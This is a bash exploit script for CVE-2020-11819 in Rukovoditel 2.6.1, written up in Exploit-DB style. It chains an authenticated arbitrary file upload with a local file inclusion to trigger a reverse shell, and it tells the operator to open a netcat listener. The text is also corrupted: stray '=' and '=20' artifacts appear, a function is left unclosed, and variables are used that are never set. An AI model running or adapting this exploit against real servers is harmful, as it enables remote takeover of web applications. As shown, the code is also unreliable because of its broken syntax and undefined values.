# Exploit Title: Rukovoditel 2.6.1 - RCE
# Date: 2020-06-11
# Exploit Author: coiffeur
# Write Up: https://therealcoiffeur.github.io/c1010
# Vendor Homepage: https://www.rukovoditel.net/
# Software Link: https://www.rukovoditel.net/download.php
# Version: v2.6.1
# CVE: CVE-2020-11819
set -e
function usage () {
echo "NAME: Rukovoditel v2.6.1, RCE"
echo "SYNOPSIS: ./rce_2.6.1.sh <BASE_URL> <SID>"
echo "Upload file test.php on the remote server and trigger the file using a LFI"
echo "AUTHOR: coiffeur"
if [ "$#" -ne 2 ]; then
echo "Setting target: $BASE_URL"
echo "Setting sid: $SID"
echo ""
echo "Extracting \$app_user['id']:"
APP_USER_ID=`curl -s "$BASE_URL/index.php?module=users/account" -H "Cookie: sid=$SID" | grep "validate_form&id=" | cut -d '=' -f 3 | cut -d "'" -f 1`
echo "=>\$app_user['id']: $APP_USER_ID"
echo "Setting arbitrary \$_POST['timestamp']:"
echo "=>\$_POST['timestamp']: 1337"
echo "Calculating \$verifyToken:"
VERIFY_TOKEN=`echo -n "$APP_USER_ID$TIMESTAMP" | md5sum | cut -d ' ' -f 1=`
echo "=>\$verifyToken: $VERIFY_TOKEN"
echo ""
echo "[*] Trying to upload test.php ... (Arbitrary File Upload)"
curl "$BASE_URL/index.php?module=users/account&action=attachments_upload" -H "Cookie: sid=$SID" -F "timestamp=$TIMESTAMP" -F "token=$VERIFY_TOKEN" -F 'Filedata=@test.php'
echo ""
echo "[*] Trying to recover time() output:"
TIME=$(date -d "`curl -si "$BASE_URL" | grep "Date:" | sed 's/Date: //'`"= +%s)
echo "=>timestamp: $TIME"
echo "[*] Trying to recover the generated filename:"=20
FILENAME=` echo -n $TIME"_test.php" | sha1sum | cut -d ' ' -f 1`
echo "=>filename: $FILENAME"
echo "[*] Trying to reconstructing full path:"
DATE=`date +"%Y/%m/%d"`
FULL_PATH=`echo -n "uploads/attachments/$DATE/$FILENAME"`
echo "=>full path: $FULL_PATH"
echo ""
echo "[!] Prepare a netcat listener by typing: nc -lvp 4444"
echo ""
echo "[*] Trying to update language settings... (Local File Inclusion)"
curl -s "$BASE_URL/index.php?module=users/account&action=update" -H "Cookie: sid=$SID" -d "fields[13]=$LANGUAGE"
echo "[*] Triggering reverse shell ..."
curl -s "$BASE_URL/index.php?module=users/account" -H "Cookie: sid=$SID="
echo "[*] Restoring default language settings"
curl -s "$BASE_URL/index.php?module=users/account&action=update" -H "Cookie: sid=$SID" -d "fields[13]=english.php"
echo "> Done"